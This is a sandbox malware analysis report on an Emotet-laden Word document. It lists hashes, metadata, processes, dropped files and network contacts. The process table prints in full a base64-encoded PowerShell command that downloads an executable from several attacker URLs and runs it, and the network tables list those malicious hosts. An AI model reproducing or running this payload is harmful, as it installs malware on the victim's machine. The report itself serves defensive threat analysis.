Malware analysis 491192326184.doc Malicious activity | ANY.RUN

Add for printing

File name:	491192326184.doc
Full analysis:	https://app.any.run/tasks/e1cc936f-341f-4566-8730-4631abed900a
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	September 19, 2019, 08:28:57
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open generated-doc emotet-doc emotet
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Oklahoma Response, Subject: European Unit of Account 17(E.U.A.-17), Author: Milo Howell, Comments: District multi-tasking primary, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:25:00 2019, Last Saved Time/Date: Wed Sep 18 07:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:	D04617C9F25D729E7DB52CC009E175D0
SHA1:	5CB5AC5AE64B93EDD40692951F2D1AD487A69D17
SHA256:	FB4E1C1E2CBDEFEA107B0B4C1975B252D2F48DB4A8B38AFB7198DFEFE1C818E9
SSDEEP:	6144:szqTwyusD0F/rbS3+c2xYbP/g9XWOPLkIi7NSU4jJntATfDdl6Mv:szqTwyusD0F/rbS3+cMYbP/g9XWsXi7n

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Executed via WMI
  - powershell.exe (PID: 4056)
- PowerShell script executed
  - powershell.exe (PID: 4056)
- Creates files in the user directory
  - powershell.exe (PID: 4056)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 3008)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3008)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title:	Oklahoma Response
Subject:	European Unit of Account 17(E.U.A.-17)
Author:	Milo Howell
Keywords:	-
Comments:	District multi-tasking primary
Template:	Normal.dotm
LastModifiedBy:	-
RevisionNumber:	1
Software:	Microsoft Office Word
TotalEditTime:	-
CreateDate:	2019:09:18 06:25:00
ModifyDate:	2019:09:18 06:25:00
Pages:	1
Words:	95
Characters:	547
Security:	None
CodePage:	Windows Latin 1 (Western European)
Company:	Larson and Sons
Lines:	4
Paragraphs:	1
CharCountWithSpaces:	641
AppVersion:	16
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	-
HeadingPairs:	Title 1
Manager:	Harber
CompObjUserTypeLen:	32
CompObjUserType:	Microsoft Word 97-2003 Document

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3008	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\491192326184.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
4056	powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcA	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

1 403

Read events

940

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRAEA4.tmp.cvr		—
		MD5:—	SHA256:—
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C1CC3A60.wmf		wmf
		MD5:471CAE0A8DBA69FE95345531EF1B0ECA	SHA256:BEFDF361E8F16DA86351089B70243C643C3ED649D077433F861917E55C0AAB83
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\293F2302.wmf		wmf
		MD5:D380A71A1B03203B26489F70EB320A64	SHA256:DD06DE5BAC74F5593922EC5CF92F079655914BED2F2F755F1C91FD8324F6FA2E
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22D77C97.wmf		wmf
		MD5:23B0417E8BC579C3B717C9824A4DE644	SHA256:717F6DD98FB041A5745384AE60D969AC4136D66A768550C87FD6B396C5610873
3008	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:62F2DA178DD59EBA6B61EE250E55F925	SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EA0136E1.wmf		wmf
		MD5:1833B97EDCE930B1BDCFF6E2C9380365	SHA256:19112BEBD47C339C780343A7C01FE8A1EC0BBB7F5B601EC8B1C3D6EA76667C04
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\107E47C5.wmf		wmf
		MD5:89CE80501D20BC01AB19B04CDA871EE3	SHA256:253C041162581317A26EB4B979847C2AAE733DA0567DE7133538A3AB14CD14B3
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD070686.wmf		wmf
		MD5:5F0EE752E9B7B678CA04ED19A7D1C088	SHA256:A75B8CBE4B2813CE89384C551D4F677A55D25E418B89192363FEFEAF6FADF269
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9E66F6E.wmf		wmf
		MD5:13F48702314854E6F39B1A7007C95DF0	SHA256:EA6F3677BD7CB018C8D2709254DE4EAD255420ACBD66132DF1202485C4DCC1B8
3008	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89AA2C9A.wmf		wmf
		MD5:B118EDD7631B6E67EA31B12533DE9F05	SHA256:21F0B4277140EFE127BB4CDF120A485B751DB816280FE3F2CC973D9434EAACBC

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4056	powershell.exe	GET	—	156.67.209.58:80	http://shael.org/hosting/TYXchcKkHz/	SG	—	—	malicious
4056	powershell.exe	GET	404	89.46.105.48:80	http://www.lottizzazionesavarra.it/wp-admin/zMifZDPur/	IT	html	217 b	suspicious
4056	powershell.exe	GET	200	156.67.209.58:80	http://shael.org/cgi-sys/suspendedpage.cgi	SG	html	7.40 Kb	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4056	powershell.exe	89.46.105.48:80	www.lottizzazionesavarra.it	Aruba S.p.A.	IT	suspicious
4056	powershell.exe	156.67.209.58:80	shael.org	Hostinger International Limited	SG	unknown
4056	powershell.exe	178.63.20.162:443	herrenmode.tk	Hetzner Online GmbH	DE	suspicious

DNS requests

Domain	IP	Reputation
shael.org	156.67.209.58	malicious
www.lottizzazionesavarra.it	89.46.105.48	suspicious
herrenmode.tk	178.63.20.162	suspicious

Threats

PID	Process	Class	Message
—	—	Potentially Bad Traffic	ET DNS Query to a .tk domain - Likely Hostile

Add for printing

No debug info

General Info

491192326184.doc

D04617C9F25D729E7DB52CC009E175D0

5CB5AC5AE64B93EDD40692951F2D1AD487A69D17

FB4E1C1E2CBDEFEA107B0B4C1975B252D2F48DB4A8B38AFB7198DFEFE1C818E9

6144:szqTwyusD0F/rbS3+c2xYbP/g9XWOPLkIi7NSU4jJntATfDdl6Mv:szqTwyusD0F/rbS3+cMYbP/g9XWsXi7n

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Executed via WMI

PowerShell script executed

Creates files in the user directory

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings